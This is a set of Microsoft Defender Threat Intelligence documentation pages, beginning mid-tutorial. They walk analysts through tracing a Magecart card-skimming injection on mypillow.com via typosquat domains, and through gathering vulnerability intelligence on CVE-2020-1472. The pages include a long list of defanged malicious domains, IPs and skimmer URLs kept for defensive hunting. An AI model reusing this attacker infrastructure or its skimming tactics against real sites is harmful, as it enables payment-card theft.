- - Notice that mypillow[.]com is pulling content via a script from the typosquat, mypiltow.com (Oct 3-5) as evidence of the script injection breach
-
- ![Tutorial Infra Chain My Pillowcom Host Pairs Live Chat Script Src](media/tutorialInfraChainMyPillowcomHostPairsLiveChatScriptSrc.gif)
-8. Pivot on ΓÇÿmypiltow[.]comΓÇÖ.
- a. At first glance, what appears different about this domain compared to mypillow.comΓÇÖs domain?
- - Reputation: Malicious, while mypillow.comΓÇÖs reputation is unknown
-
- ![Tutorial InfraChain My Piltowcom Reputation](media/tutorialInfraChainMyPiltowcomReputation.png)
-
- ![Tutorial Infra Chain My Pillowcom Reputation](media/tutorialInfraChainMyPillowcomReputation.png)
-9. Navigate to the Data tab and from the Resolutions results, pivot off the IP address that mypiltow[.]com resolved to during October of 2018. Repeat this step for mypillow.com as well.
- a. What do you notice about the differences in IP addresses between mypillow.com and mypiltow[.]com during October of 2018?
- - IP address, 195.161.41[.]65, mypiltow[.]com had resolved to, is hosted in Russia.
- - Different ASN used.
-
- ![Tutorial Infra Chain My Piltow Ip Summary](media/tutorialInfraChainMyPiltowIpSummary.png)
-
- ![Tutorial Infra Chain My Pillow Ip Summary](media/tutorialInfraChainMyPillowIpSummary.png)
-10. Scroll to the Articles section.
- a. What other Articles have been published that relate to mypiltow.com?
- - RiskIQ: Magecart Injected URLs and C2 Domains, June 3-14, 2022
- - RiskIQ: Magecart injected URLs and C2 Domains, May 20-27, 2022
- - Commodity Skimming & Magecart Trends in First Quarter of 2022
- - RiskIQ: Magecart Group 8 Activity in Early 2022
- - Magecart Group 8 Real Estate: Hosting Patterns Associated with the Skimming Group
- - Inter Skimming Kit Used in Homoglyph Attacks
- - Magecart Group 8 Blends into NutriBullet.com Adding To Their Growing List of Victims
-
- ![Tutorial Infra Chain My Piltowcom Articles](media/tutorialInfraChainMyPiltowcomArticles.gif)
-11. Review each of the additional articles from Step 9.
- a. What additional information can you find about the Magecart threat actor group? (targets, TTPs, additional IOCs, etc.)
-12. Navigate to the Data tab and select the Whois Data blade and compare the Whois information between ΓÇÿmypillow.comΓÇÖ and ΓÇÿmypiltow[.]comΓÇÖ
- a. What Whois values differ?
- - mypillow.com
- 1. If you select the Whois record from October of 2011, you will find that the domain is clearly owned by My Pillow Inc.
-
- ![Tutorial Infra Chain My Piltowcom 2 Whois](media/tutorialInfraChainMyPiltowcom2Whois.png)
- 2. mypiltow[.]com
-
- 3. If you select the Whois record from October of 2018, you will find that mypiltow[.]com was registered in Hong Kong SAR and is privacy protected by Domain ID Shield Service CO.
-
- 4. mypiltow[.]comΓÇÖs registrar is OnlineNIC, Inc.
-
- ![Tutorial Infra Chain My Piltowcom 2 Whois](media/tutorialInfraChainMyPiltowcom2Whois.png)
-
- b. What appears suspicious thus far about mypiltow[.]com given the A records and Whois details we have analyzed?
- - When assessing if mypiltow[.]com may be legitimate company infrastructure, an analyst should find it odd that a Russian IP is primarily guarded by a Chinese privacy service for a US based company.
-13. Search ΓÇÿlivechatinc[.]orgΓÇÖ in Defender TIΓÇÖs Threat Intelligence Home Page.
- a. What new articles are associated with this domain that we did not see when we searched mypillow.com in Part 1?
- - Magecart Group 8 Blends into NutriBullet.com Adding To Their Growing List of Victims
-14. Select the Magecart Group 8 Blends into NutriBullet.com Adding To Their Growing List of Victims article.
- a. What information is available about this related campaign?
- - The ΓÇÿMagecart Group 8 Blends into NutriBullet.com Adding To Their Growing List of VictimsΓÇÖ article was published on March 18, 2020. In this article, we find out that Nutribullet, Amerisleep, ABS-CBN were also victims of the Magecart threat actor group.
-15. Select the Public Indicators tab.
- a. What IOCs are listed related to this campaign?
- - URLs
- 1. hxxps://coffemokko[.]com/tr/, hxxps://freshdepor[.]com/tr/, hxxps://prodealscenter[.]com/tr/, hxxps://scriptoscript[.]com/tr/, hxxps://swappastore[.]com/tr/
- 2. Domains
- - 3lift[.]org, abtasty[.]net, adaptivecss[.]org, adorebeauty[.]org, all-about-sneakers[.]org, amerisleep.github[.]io, ar500arnor[.]com, authorizecdn[.]com, bannerbuzz[.]info, battery-force[.]org, batterynart[.]com, blackriverimaging[.]org, braincdn[.]org, btosports[.]net, cdnassels[.]com, cdnmage[.]com, chicksaddlery[.]net, childsplayclothing[.]org, christohperward[.]org, citywlnery[.]org, closetlondon[.]org, cmytuok[.]top, coffemokko[.]com, coffetea[.]org, configsysrc[.]info, dahlie[.]org, davidsfootwear[.]org, dobell[.]su, elegrina[.]com, energycoffe[.]org, energytea[.]org, etradesupply[.]org, exrpesso[.]org, foodandcot[.]com, freshchat[.]info, freshdepor[.]com, greatfurnituretradingco[.]org, info-js[.]link, jewsondirect[.]com, js-cloud[.]com, kandypens[.]net, kikvape[.]org, labbe[.]biz, lamoodbighats[.]net, link js[.]link, livechatinc[.]org, londontea[.]net, mage-checkout[.]org, magejavascripts[.]com, magescripts[.]pw, magesecuritys[.]com, majsurplus[.]com, map-js[.]link, mcloudjs[.]com, mechat[.]info, melbounestorm[.]com, misshaus[.]org, mylrendyphone[.]com, mypiltow[.]com, nililotan[.]org, oakandfort[.]org, ottocap[.]org, parks[.]su, paypaypay[.]org, pmtonline[.]su, prodealscenter[.]com, replacemyremote[.]org, sagecdn[.]org, scriptoscript[.]com, security-payment[.]su, shop-rnib[.]org, slickjs[.]org, slickmin[.]com, smart-js[.]link, swappastore[.]com, teacoffe[.]net, top5value[.]com, track-js[.]link, ukcoffe[.]com, verywellfitnesse[.]com, walletgear[.]org, webanalyzer[.]net, zapaljs[.]com, zoplm[.]com
-
-16. Search mypillow.com in Defender TIΓÇÖs Threat Intelligence Home Page and select the Data tab. Select the Host Pairs Data blade. Sort by First Seen and locate Host Pair relationships that occurred in October of 2018.
-
- a. Do you notice a similar script relationship between mypillow.com and secure.livechatinc[.]org that mirrors the same relationship mypillow.com had with mypiltow[.]com?
- - Notice how www.mypillow.com was first observed reaching out to secure.livechatinc[.]org on 10/26/2018, because a script GET request was observed from www.mypillow.com to secure.livechatinc[.]org. That relationship lasted until 11/19/2018.
-
- ![Tutorial Infra Chain My Pillowcom Host Pairs Live Chat ScriptSrc](media/tutorialInfraChainMyPillowcomHostPairsLiveChatScriptSrc.gif)
- ii. In addition, secure.livechatinc[.]org reached out to www.mypillow.com to access www.mypillow.comΓÇÖs server (xmlhttprequest).
-17. Review mypillow.comΓÇÖs Host Pair relationships further.
- a. Does mypillow.com have any host pair relationships with a similar domain name to secure.livechatinc[.]org?
- - Yes. There are multiple types of observed relationships mypillow.com hosts had with the following domains:
- 1. cdn.livechatinc[.]com, secure.livechatinc[.]com, api.livechatinc[.]com
- - The relationship causes include:
- 1. script.src
- 2. iframe.src
- 3. unknown
- 4. topLevelRedirect
- 5. img.src
- 6. xmlhttprequest
- - Livechat is a live support chat service that online retailers can add to their websites, so itΓÇÖs a third-party resource and itΓÇÖs used by a lot of e-commerce platforms, including MyPillow. This fake domain is a little bit more interesting because their official site is actually livechatinc.com. Therefore, in this case, they used a top-level-domain typosquat to hide the fact they placed a second skimmer on the MyPillow website.
-18. Go back and find a host pair relationship with ΓÇÿsecure.livechatinc[.]orgΓÇÖ and pivot off that hostname.
- a. What IP address did this host resolve to during October of 2018?
- - 212.109.222[.]230
-
- ![Tutorial Infra Chain Secure Live Chat Inc Org Resolutions](media/tutorialInfraChainSecureLiveChatIncOrgResolutions.png)
- - Notice how this IP address is also hosted in Russia and the ASN Organization is JSC IOT.
-
- ![Tutorial Infra Chain Secure Live Chat Inc Org Ip Summary](media/tutorialInfraChainSecureLiveChatIncOrgIpSummary.png)
-19. Search ΓÇÿsecure.livechatinc[.]orgΓÇÖ in Defender TIΓÇÖs Threat Intelligence Home Page, select the Data tab, and click on the Whois blade. Select the record from 12/25/2018.
- a. What Registrar was used for this record?
- - OnlineNIC Inc.
- 1. This is the same Registrar that was used to register mypiltow[.]com during the same campaign.
- 2. If you select the record from 12/25/2018, you will notice that the domain was also using the same Chinese privacy guarding service, Domain ID Shield Service, that mypiltow[.]com had also used.
- b. What name servers were used for this record?
- - ns1.jino.ru
- - ns2.jino.ru
- - ns3.jino.ru
- - ns4.jino.ru
- 1. These were the same nameservers used in the 10/01/2018 record for mypiltow[.]com. Adversaries will often use the same nameservers to segment their infrastructure.
-
- ![Tutorial Infra Chain Secure Live Chat Inc Org Whois](media/tutorialInfraChainSecureLiveChatIncOrgWhois.png)
-
- ![Tutorial Infra Chain My Piltowcom 2 Whois](media/tutorialInfraChainMyPiltowcom2Whois.png)
-20. Select the Host Pairs Data blade.
- a. What host pair relationships do you see from October and November of 2018?
- - secure.livechatinc[.]org redirected users to secure.livechatinc.com on 11/19/2022. This is more than likely an obfuscation technique to evade detection.
- - www.mypillow.com was pulling a script hosted on secure.livechatinc[.]org (the fake LiveChat site) from 10/26/2018 through 11/19/2022. During this timeframe, www.mypillow.comΓÇÖs user purchases were potentially compromised.
- - secure.livechatinc[.]org was requesting data from the server, www.mypillow.com, hosting the real MyPillow website (xmlhttprequest) between 10/27/2018 through 10/29/2018.
-
- ![Tutorial Infra Chain Secure Live Chat Inc Org Host Pairs](media/tutorialInfraChainSecureLiveChatIncOrgHostPairs.png)
- b. What do you believe these relationships mean?
-
-## Clean up resources
-There are no resources to clean up in this section.
-
-## Next Steps
-In this tutorial, you learned how to gather threat intelligence and infrastructure chain together indicators of compromise.
threat-intelligence Gathering Vulnerability Intelligence https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/gathering-vulnerability-intelligence.md
-
Title: 'Tutorial: Gathering vulnerability intelligence'
-description: 'In this tutorial, practice gathering vulnerability intelligence associated with the Darkside threat actor group using Microsoft Defender Threat Intelligence (Defender TI).'
----- Previously updated : 08/04/2022---
-# Tutorial: Gathering vulnerability intelligence
-
-## In this tutorial, you will learn how to:
--- Learn about Microsoft Defender Threat Intelligence (Defender TI)ΓÇÖs Threat Intelligence Home Page features-- Perform several types of indicator searches to gather vulnerability intelligence-
-![ti Overview Home Page Chrome Screenshot](media/tiOverviewHomePageChromeScreenshot.png)
-
-## Prerequisites
--- A Microsoft Entra ID or personal Microsoft account. [Login or create an account](https://signup.microsoft.com/)-- A Microsoft Defender Threat Intelligence (Defender TI) Premium license.-
- > [!NOTE]
- > Users without a Defender TI Premium license will still be able to log into the Defender Threat Intelligence Portal and access our free Defender TI offering.
-
-## Disclaimer
-
-Microsoft Defender Threat Intelligence (Defender TI) may include live, real-time observations and threat indicators, including malicious infrastructure and adversary-threat tooling. Any IP and domain searches within our Defender TI platform are safe to search.
-Microsoft will share online resources (e.g., IP addresses, domain names) that should be considered real threats posing a clear and present danger.
-We ask that users use their best judgment and minimize unnecessary risk while interacting with malicious systems when performing the tutorial below. Please note that Microsoft has worked to minimize risk by defanging malicious IP addresses, hosts, and domains.
-
-## Before You Begin
-
-As the disclaimer states above, suspicious, and malicious indicators have been defanged for your safety. Please remove any brackets from IPs, domains, and hosts when searching in Defender TI. Do not search these indicators directly in your browser.
-
-## Open Defender TIΓÇÖs Threat Intelligence Home Page
--- Access the [Defender Threat Intelligence Portal](https://ti.defender.microsoft.com/).-- Complete Microsoft authentication to access portal.-
-## Learn about Defender TIΓÇÖs Threat Intelligence Home Page features
-
-1. Review the Search bar options by selecting the search bar and clicking on the All drop-down option.
-
- ![Tutorial Vulnerability Intel Search Bar](media/tutorialVulnerabilityIntelSearchBar.png)
-
-2. Review the featured articles and articles within the Threat Intelligence Home Page.
-
- ![Tutorial Vulnerability Intel Articles](media/tutorialVulnerabilityIntelArticles.png)
-
-## Perform several types of indicator searches to gather vulnerability intelligence
-
-1. Search ΓÇÿCVE-2020-1472' and review the associated vulnerability article, ΓÇÿCVE-2020-1472'.
-
- ![Screen Shot 2022-08-03 at 3 46 21 PM](https://user-images.githubusercontent.com/106117711/182717029-2c9992cd-e005-4c39-aeb3-edf7d16774cb.png)
-
-2. The "Related Articles" tab displays the article titled ΓÇÿRiskIQ detections into components and indicators related to FireEyeΓÇÖs breach disclosure and countermeasuresΓÇÖ. Click on the article to investigate.
-
- ![Tutorial Vulnerability Intel Fire Eye Breach Article](media/tutorialVulnerabilityIntelFireEyeBreachArticle.png)
-
-3. Review the articleΓÇÖs public indicators.
-
- ![Tutorial Vulnerability Intel Fire Eye Breach Article Indicators](media/tutorialVulnerabilityIntelFireEyeBreachArticleIndicators.gif)
-
-4. Search ΓÇÿ173.234.155[.]208ΓÇÖ IP address in the Threat Intelligence Search bar.
-
- ![Tutorial Vulnerability Intel Ip Search](media/tutorialVulnerabilityIntelIpSearch.png)
-
-5. Review the Summary tab results that return: reputation, analyst insights, articles, services, resolutions, certificates, and projects.
-
- ![Tutorial Vulnerability Intel Ip Summary Tab](media/tutorialVulnerabilityIntelIpSummaryTab.png)
-
-6. Navigate to the Data tab and review the data and intelligence data sets: resolutions, Whois, certificates, trackers, components, cookies, services, dns, and articles.
-
- ![Tutorial Vulnerability Intel Ip Review](media/tutorialVulnerabilityIntelIpReview.gif)
-
- ![Tutorial Vulnerability Intel Ip Article](media/tutorialVulnerabilityIntelIpArticle.png)
-
-7. Navigate back to the Resolutions data blade and pivot on ΓÇÿmyaeroplan[.]comΓÇÖ.
-
- ![Tutorial Vulnerability Intel Domain Pivot](media/tutorialVulnerabilityIntelDomainPivot.png)
-
-8. Navigate to the Data tab and review the resolutions, Whois, certificates, subdomains, trackers, components, cookies, DNS, and reverse DNS data sets.
-
- ![Tutorial Vulnerability Intel Domain Review](media/tutorialVulnerabilityIntelDomainReview.gif)
-
-9. Take note of the following artifacts from steps 5 and 7:
-
- |&nbsp;|&nbsp;|
- | | |
- | Whois Address | 1928 E. Highland Ave. Ste F104 PMB# 255 |
- | Whois City | phoenix |
- | Whois State | az |
- | Whois Postal Code | 85016 |
- | Whois Country | United States |
- | Whois Phone | 13478717726 |
- | Whois Nameserver | ns0.1984[.]is |
- | Whois Nameserver | ns1.1984[.]is |
- | Whois Nameserver | ns2.1984[.]is |
- | Whois Nameserver | ns1.1984hosting[.]com |
- | Whois Nameserver | ns2.1984hosting[.]com |
- | Certificate Sha1 | [ead5b033ed4fd342261f389f0930aa7de1fba33d](https://ti.defender.microsoft.com/search/certificates?query=ead5b033ed4fd342261f389f0930aa7de1fba33d&field=sha1) |
- | Certificate Serial Number | 236976486488328334603103229327145294996 |
- | Certificate Issuer Common Name | COMODO RSA Domain Validation Secure Server CA |
- | Certificate Subject Common Name | myaeroplan[.]com |
- | Certificate Subject Alternative Name | [myaeroplan[.]com](https://ti.defender.microsoft.com/search/trackers/hosts?query=www.aeroplan.com&field=MarkOfTheWebSourceHost) |
- | Certificate Subject Alternative Name | www.myaeroplan[.]com |
- | Tracker type | MarkOfTheWebSourceHost |
- | Tracker value | [www.aeroplan.com](https://ti.defender.microsoft.com/search/trackers/hosts?field=MarkOfTheWebSourceHost&query=www.aeroplan.com) |
- | Component Name + Version | [Apache (v2.4.29)](https://ti.defender.microsoft.com/search/components/hosts?category=Server&query=Apache&version=2.4.29) |
- | Cookie Name | [PHPSESSID](https://ti.defender.microsoft.com/search/cookies/hosts?query=PHPSESSID&field=name) |
- | Cookie Domain | [myaeroplan[.]com](https://ti.defender.microsoft.com/search/cookies/hosts?query=myaeroplan.com&field=domain) |
- | Threat Articles | [Points Guys: Aeroplan Frequent Flyer Program Credential Harvesting Campaign](https://ti.defender.microsoft.com/articles/99527909)|
-
-10. Perform the respective artifact searches from step 8. Note: YouΓÇÖll want to reference the search options you learned from the Learn about Defender TIΓÇÖs Threat Intelligence Home Page features section.
-
-## Clean up resources
-
-There are no resources to clean up in this section.
threat-intelligence Index Backup https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/index-backup.md
-
Title: 'What is Microsoft Defender Threat Intelligence (Defender TI)? - Backup'
-description: 'In this overview article, learn about the main features that come with Microsoft Defender Threat Intelligence (Defender TI). - Backup'
----- Previously updated : 08/02/2022---
-# What is Microsoft Defender Threat Intelligence (Defender TI)? - Backup
-
-Microsoft Defender Threat Intelligence (Defender TI) is a platform that streamlines triage, incident response, threat hunting, vulnerability management, and cyber threat intelligence analyst workflows when conducting threat infrastructure analysis and gathering threat intelligence. Analysts spend a significant amount of time on data discovery, collection, and parsing, instead of focusing on what actually helps their organization defend themselves--deriving insights about the actors through analysis and correlation.?
-
-Often, analysts must go to multiple repositories to obtain the critical data sets they need to assess a suspicious domain, host, or IP address. DNS data, WHOIS information, malware, and SSL certificates provide important context to indicators of compromise (IOCs), but these repositories are widely distributed and donΓÇÖt always share a common data structure, making it difficult to ensure analysts have all relevant data needed to make a proper and timely assessment of suspicious infrastructure.
-
-Interacting with these data sets can be cumbersome and pivoting between these repositories is time-consuming, draining the resources of security operations groups that constantly need to re-prioritize their response efforts.
-
-Cyber Threat Intelligence Analysts struggle with balancing a breadth of threat intelligence ingestion with the analysis of which threat intelligence poses the biggest threats to their organization and/or industry.
-
-In the same breadth, Vulnerability Intelligence Analysts battle correlating their asset inventory with CVE information to prioritize the investigation and remediation of the most critical vulnerabilities associated with their organization.
-
-MicrosoftΓÇÖs goal is to re-imagine the analyst workflow by developing a platform, Defender TI, that aggregates and enriches critical data sources and displays data in an innovative, easy to use interface to correlate when indicators are linked to articles and vulnerabilities, infrastructure chain together indicators of compromise (IOCs), and collaborate on investigations with fellow Defender TI licensed users within their tenant. With security organizations actioning an ever-increasing amount of intelligence and alerts within their environment, having a Threat Analysis & Intelligence Platform that allows for accurate and timely assessments of alerting is important.
-
-Below is a screenshot of Defender TIΓÇÖs Threat Intelligence Home Page. Analysts can quickly scan new featured articles as well as begin their intelligence gathering, triage, incident response, and hunting efforts by performing a keyword, artifact or CVE-ID search.
-
-![TI Overview Edge Screenshot](media/tiOverviewEdgeScreenshot.png)
-
-## Defender TI articles
-Articles are narratives by Microsoft that provide insight into threat actors, tooling, attacks, and vulnerabilities. Defender TI featured and articles are not blog posts about threat intelligence; while they summarize different threats, they also link to actionable content and key indicators of compromise to help users take action. By including this technical information in the threat summaries, we enable users to continually track threat actors, tooling, attacks, and vulnerabilities as they change.
-
-## Featured articles
-
-The featured article section of the Defender TI Threat Intelligence Home Page (right below the search bar) shows you the featured Microsoft content:
-
-![TI Overview Featured Articles](media/tiOverviewFeaturedArticles.png)
-
-Clicking the article takes you to the underlying article content. The article synopsis gives the user a quick understanding of the article. The Indicators call-out shows how many Public and Defender TI indicators are associated with the article.
-
-![TI Overview Featured Article](media/tiOverviewFeaturedArticle.png)
-
-## Articles
-
-All articles (including featured articles) are listed under the Microsoft Defender TI Threat Intelligence Home Page articles section, ordered by their creation date (descending):
-
-![TI Overview Articles](media/tiOverviewArticles.png)
-
-## Article descriptions
-
-The description section of the article detail screen contains information about the attack or attacker profiled. The content can range from very short (in the case of OSINT bulletins) or quite long (for long-form reporting ΓÇô especially when Microsoft has augmented the report with content). The longer descriptions may contain images, links to the underlying content, links to searches within Defender TI, attacker code snippets, and firewall rules to block the attack:
-
-![TI Overview Article Description](media/tiOverviewArticleDescription.png)
-
-## Public indicators
-
-The public indicators section of the screen shows the previously published indicators related to the article. The links in the public indicators take one to the underlying Defender TI data or relevant external sources (e.g., VirusTotal for hashes).
-
-![TI Overview Article Public Indicators](media/tiOverviewArticlePublicIndicators.png)
-
-## Defender TI indicators
-
-The Defender TI indicators section covers the indicators that Defender TIΓÇÖs research team has found and added to the articles.
-
-These links also pivot into the relevant Defender TI data or the corresponding external source.
-
-![TI Overview Article Defender TI Indicators](media/tiOverviewArticleDefenderTiIndicators.png)
-
-## Vulnerability articles
-
-Defender TI offers CVE-ID searches to help users identify critical information about the CVE. CVE-ID searches result in Vulnerability Articles.
-
-Vulnerability Articles provide key context behind CVEs of interest. Each article contains a description of the CVE, a list of affected components, tailored mitigation procedures and strategies, related intelligence articles, references in Deep & Dark Web chatter, and other key observations. These articles provide deeper context and actionable insights behind each CVE, enabling users to more quickly understand these vulnerabilities and quickly mitigate them.
-
-Vulnerability Articles also include a Defender TI Priority Score and severity indicator. The Defender TI Priority Score is a unique algorithm which reflects the priority of a CVE based on the CVSS score, exploits, chatter, and linkage to malware. Furthermore, the Defender TI Priority Score evaluates the recency of these components so users can understand which CVEs should be remediated first.
-
-## Reputation scoring
-
-Defender TI provides proprietary reputation scores for any Host, Domain, or IP Address. Whether validating the reputation of a known or unknown entity, this score helps users quickly understand any detected ties to malicious or suspicious infrastructure. The platform provides quick information about the activity of these entities, such as First and Last Seen timestamps, ASN, country/region, associated infrastructure, and a list of rules that impact the reputation score when applicable.
-
-![Reputation Summary Card](media/reputationSummaryCard.png)
-
-IP reputation data is important to understanding the trustworthiness of your own attack surface and is also useful when assessing unknown hosts, domains or IP addresses that appear in investigations. These scores will uncover any prior malicious or suspicious activity that impacted the entity, or other known indicators of compromise that should be considered.
-
-For more information, see [Reputation scoring](reputation-scoring.md).
-
-## Analyst insights
-
-Analyst insights distill MicrosoftΓÇÖs vast data set into a handful of observations that simplify the investigation and make it more approachable to analysts of all levels.
-
-Insights are meant to be small facts or observations about a domain or IP address and provide Defender TI users with the ability to make an assessment about the artifact queried and improve a user's ability to determine if an indicator being investigated is malicious, suspicious, or benign.
-
-For more information, see [Analyst insights](analyst-insights.md).
-
-![Summary Tab Analyst Insights](media/summaryTabAnalystInsights.png)
-
-## Data sets
-Microsoft centralizes numerous data sets into a single platform, Defender TI, making it easier for MicrosoftΓÇÖs community and customers to conduct infrastructure analysis. MicrosoftΓÇÖs primary focus is to provide as much data as possible about Internet infrastructure to support a variety of security use cases.
-
-Microsoft collects, analyzes, and indexes internet data to assist users in detecting and responding to threats, prioritizing incidents, and proactively identifying adversariesΓÇÖ infrastructure associated with actor groups targeting their organization. Microsoft collects internet data via itsΓÇÖ PDNS sensor network, global proxy network of virtual users, port scans, and leverages third-party sources for malware and added Domain Name System (DNS) data.
-
-This internet data is categorized into two distinct groups: traditional and advanced. Traditional data sets include Resolutions, WHOIS, SSL Certificates, Subdomains, Hashes, DNS, Reverse DNS, and Services. Advanced data sets include Trackers, Components, Host Pairs, and Cookies. Trackers, Components, Host Pairs, and Cookies data sets are collected from observing the Document Object Model (DOM) of web pages crawled. Additionally, Components and Trackers are also observed from detection rules that are triggered based on the banner responses from port scans or SSL Certificate details. Many of these data sets have various methods to sort, filter, and download data, making it easier to access information that may be associated with a specific artifact type or time in history.
-
-For more information, see:
--- [Sorting, filtering, and downloading data](sorting-filtering-and-downloading-data.md)-- [Data sets](data-sets.md)-
-![ti Overview Data Sets](media/tiOverviewDataSets.png)
-
-## Tags
-
-Defender TI tags are used to provide quick insight about an artifact, whether derived by the system or generated by other users. Tags aid analysts in connecting the dots between current incidents and investigations and their historical context for improved analysis.
-
-The Defender TI platform offers two types of tags: system tags and custom tags.
-
-For more information, see [Using tags](using-tags.md).
-
-![Tags Custom](media/tagsCustom.png)
-
-## Projects
-
-MicrosoftΓÇÖs Defender TI platform allows users to develop multiple project types for organizing indicators of interest and indicators of compromise from an investigation. Projects contain a listing of all associated artifacts and a detailed history that retains the names, descriptions, and collaborators.
-
-When a user searches an IP address, domain, or host in Defender TI, if that indicator is listed within a project the user has access to, the user can see a link to the project from the Projects sections in the Summary tab as well as Data tab. From here, the user can navigate to the details of the project for more context about the indicator before reviewing the other data sets for more information. This helps analysts to avoid reinventing the wheel of an investigation one of their Defender TI tenant users may have already started or add onto that investigation by adding new artifacts (indicators of compromise) related to that project (if they have been added as a collaborator to the project).
-
-For more information, see [Using projects](using-projects.md).
-
-![Defender TI Overview Projects](media/defenderTIOverviewProjects.png)
-
-## Data residency, availability, and privacy
-
-Microsoft Defender Threat Intelligence contains both global data and customer-specific data. The underlying internet data is global Microsoft data; labels applied by customers are considered customer data. All customer data is stored in the region of the customerΓÇÖs choosing.
-
-For security purposes, Microsoft collects users' IP addresses when they log in. This data is stored for up to 30 days but may be stored longer if needed to investigate potential fraudulent or malicious use of the product.
-
-In the case of a region down scenario, customers should see no downtime as Defender TI uses technologies that replicate data to a backup regions.
-
-Defender TI processes customer data. By default, customer data is replicated to the paired region.
-
-## Next steps
-
-For more information, see:
--- [Quickstart: Learn how to access Microsoft Defender Threat Intelligence and make customizations in your portal](learn-how-to-access-microsoft-defender-threat-intelligence-and-make-customizations-in-your-portal.md)-- [Data sets](data-sets.md)-- [Searching and pivoting](searching-and-pivoting.md)-- [Sorting, filtering, and downloading data](sorting-filtering-and-downloading-data.md)-- [Infrastructure chaining](infrastructure-chaining.md)-- [Reputation scoring](reputation-scoring.md)-- [Analyst insights](analyst-insights.md)-- [Using projects](using-projects.md)-- [Using tags](using-tags.md)
threat-intelligence Infrastructure Chaining https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/infrastructure-chaining.md
-
Title: 'Microsoft Defender Threat Intelligence (Defender TI): Infrastructure Chaining'
-description: 'In this concept article, learn about infrastructure chaining and how you can apply that process to perform threat infrastructure analysis using Microsoft Defender Threat Intelligence (Defender TI).'
----- Previously updated : 08/02/2022---
-# Infrastructure Chaining
-
-Infrastructure chaining leverages the relationships between highly connected datasets to build out an investigation. This process is the core of threat infrastructure analysis and allows organizations to surface new connections, group similar attack activity and substantiate assumptions during incident response.
-
-![Infrastructure chaining](media/infrastructureChaining.png)
-
-## Prerequisites
-
-1. Review [Microsoft Defender Threat Intelligence (Defender TI)ΓÇÖs Data sets overview article](data-sets.md)
-2. Review [Microsoft Defender Threat Intelligence (Defender TI)ΓÇÖs Searching and pivoting how-to article](searching-and-pivoting.md)
-
-## All you need is a starting point...
-
-We see attack campaigns employ a wide array of obfuscation techniques such as simple geo filtering to complex tactics like passive OS fingerprinting. This can potentially stop a point in time investigation in its tracks. The screenshot above highlights the concept of infrastructure chaining. With our data enrichment capability, we could start with a piece of malware that attempts to connect to an IP address (possibly a C2). That IP address may have hosted an SSL cert that has a common name such as a domain name. That domain may be connected to a page that contains a unique tracker in the code, such as a NewRelicID or some other analytic ID we may have observed elsewhere. Or, perhaps the domain may have historically been connected to other infrastructure that may shed light on our investigation. The main takeaway is that one data point taken out of context may not be especially useful but when we observe the natural connection to all this other technical data, we can start to stitch together a story.
-
-## An adversaryΓÇÖs outside-In perspective
-
-An adversaryΓÇÖs outside-in perspective enables them to take advantage of your continually expanding web and mobile presence that operates outside of your firewall.
-
-Approaching and interacting with the web and mobile properties as a real user enables MicrosoftΓÇÖs crawling, scanning, and machine-learning technology to disarm adversariesΓÇÖ evasion techniques by collecting user session data, detecting phishing, malware, rogue apps, unwanted content, and domain infringement at scale. This helps deliver actionable, event-based threat alerts and workflows in the form of [threat intelligence](index.md), [system tags](using-tags.md), [analyst insights](analyst-insights.md), and [reputation scores](reputation-scoring.md) associated with adversariesΓÇÖ infrastructure.
-
-As more threat data becomes available, more tools, education, and effort are required for analysts to understand the data sets and their corresponding threats. Microsoft Defender Threat Intelligence (Defender TI) unifies these efforts by providing a single view into multiple data sources.
-
-## Next steps
-For more information, see [Tutorial: Gathering threat intelligence and infrastructure chaining](gathering-threat-intelligence-and-infrastructure-chaining.md).
threat-intelligence Learn How To Access Microsoft Defender Threat Intelligence And Make Customizations In Your Portal https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/defender/threat-intelligence/learn-how-to-access-microsoft-defender-threat-intelligence-and-make-customizations-in-your-portal.md
-
Title: 'Quickstart: Accessing Microsoft Defender Threat Intelligence (Defender TI)'
-description: In this quickstart, learn how to access Microsoft Defender Threat Intelligence (Defender TI) in the Microsoft Defender portal, as well as configure your profile and preferences and access help resources in the Defender portal.
----- Previously updated : 04/19/2024----
-# Quickstart: Learn how to access Microsoft Defender Threat Intelligence and make customizations
-
->[!IMPORTANT]
-> On June 30, 2024, The Microsoft Defender Threat Intelligence (Defender TI) standalone portal (https://ti.defender.microsoft.com) will be retired and will no longer be accessible. Customers can continue using Defender TI in the [Microsoft Defender portal](https://aka.ms/mdti-intel-explorer) or with [Microsoft Copilot for Security](security-copilot-and-defender-threat-intelligence.md). [Learn more](https://aka.ms/mdti-standaloneportal)
-
-This guide walks you through how to access Microsoft Threat Intelligence (Defender TI) from the Microsoft Defender portal, adjust the portalΓÇÖs theme to make it easier on your eyes when using it, and find sources for enrichment so you can see more results when gathering threat intelligence.
-
- :::image type="content" source="/defender/threat-intelligence/media/quickstart-intel-explorer.png" alt-text="Screenshot of the Microsoft Defender Threat Intelligence Intel explorer in the Microsoft Defender portal." lightbox="/defender/threat-intelligence/media/quickstart-intel-explorer.png":::
-
-## Prerequisites
--- A Microsoft Entra ID or personal Microsoft account. [Sign in or create an account](https://signup.microsoft.com/)-- A Defender TI premium license.-
- > [!NOTE]
- > Users without a Defender TI premium license can still access our free Defender TI offering.
-
-## Open Defender TI in the Microsoft Defender portal
-
-1. Access the [Defender portal](https://security.microsoft.com/) and complete the Microsoft authentication process. [Learn more about the Defender portal](/microsoft-365/security/defender/microsoft-365-defender-portal)
-2. Navigate to **Threat intelligence**. You can access Defender TI in the following pages:
- - Intel profiles
- - Intel explorer
- - Intel projects
-
- :::image type="content" source="/defender/threat-intelligence/media/quickstart-navigation.png" alt-text="Screenshot of the Microsoft Defender portal with the Threat intelligence navigation links highlighted." lightbox="/defender/threat-intelligence/media/quickstart-navigation.png":::
-## Adjust the Defender portalΓÇÖs display theme to dark or light mode
-
-By default, the Defender portalΓÇÖs display theme is set to light mode. To switch to dark mode, on the Defender portal, navigate to **Home** then select **Dark mode** on the upper right-right corner of the home page.
-
-![Partial screenshot of the Defender portal home page with the Dark mode icon hightlighted.](media/quickstart-dark-mode.png)
-
-To switch back to light mode, select **Light mode** in the same upper-right hand corner of the home page.
-
-![Partial screenshot of the Defender portal home page with the Light mode icon hightlighted.](media/quickstart-light-mode.png)
--
-## Get help and learn about Defender TI support resources
-
